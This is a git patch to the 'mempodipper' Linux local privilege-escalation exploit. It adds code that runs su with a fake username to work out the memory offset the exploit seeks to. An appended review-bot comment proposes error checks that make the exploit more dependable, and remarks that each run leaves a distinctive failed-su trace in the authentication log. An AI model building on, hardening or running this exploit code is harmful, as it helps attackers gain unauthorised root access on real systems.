From 34d603029eb96fde8bc39a6f10ae84115e11008f Mon Sep 17 00:00:00 2001
From: "Jason A. Donenfeld"
Date: Sun, 22 Jan 2012 22:02:11 +0100
Subject: Calculate length of su dynamically.
---
 mempodipper.c | 8 +++++++-
 1 file changed, 7 insertions(+), 1 deletion(-)
diff --git a/mempodipper.c b/mempodipper.c
index 2a80857..64919fa 100644
--- a/mempodipper.c
+++ b/mempodipper.c
@@ -189,7 +189,13 @@ int main(int argc, char **argv)
 }
 printf("[+] Resolved exit@plt to 0x%lx.\n", address);
 }
- unsigned long su_padding = strlen("Unknown id: ");
+ printf("[+] Calculating su padding.\n");
+ FILE *command = popen("su this-user-does-not-exist 2>&1", "r");
+ char result[256];
+ result[0] = 0;
+ fgets(result, 256, command);
+ pclose(command);
+ unsigned long su_padding = (strstr(result, "this-user-does-not-exist") - result) / sizeof(char);
 unsigned long offset = address - su_padding;
 printf("[+] Seeking to offset 0x%lx.\n", offset);
 lseek64(fd, offset, SEEK_SET);
-- 
cgit v1.2.3-59-g8ed1b
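Review bot: The added padding probe uses its return values unchecked: `popen()` can return NULL, which is then handed to `fgets()` and `pclose()`, and `strstr()` returns NULL whenever the first line of output does not contain the marker, so the subtraction from `result` is undefined and `su_padding` becomes a garbage value that flows straight into `offset` and `lseek64()`. The code should stop rather than continue with an unknown offset, e.g. `if (command == NULL) return 1;` after the `popen()` call and `char *hit = strstr(result, "this-user-does-not-exist"); if (hit == NULL) return 1;` before computing `su_padding = hit - result`. The `/ sizeof(char)` is a no-op because `sizeof(char)` is 1 by definition, and `sizeof result` would be safer than repeating the literal 256 in `fgets()`. A comment should also record that this step now runs `su` for the literal account name `this-user-does-not-exist` on every invocation, which probably leaves a distinctive failed-su entry in the host's authentication log, depending on how logging is configured. `main` starts and ends outside the hunk, so the `return 1` exit convention is an assumption.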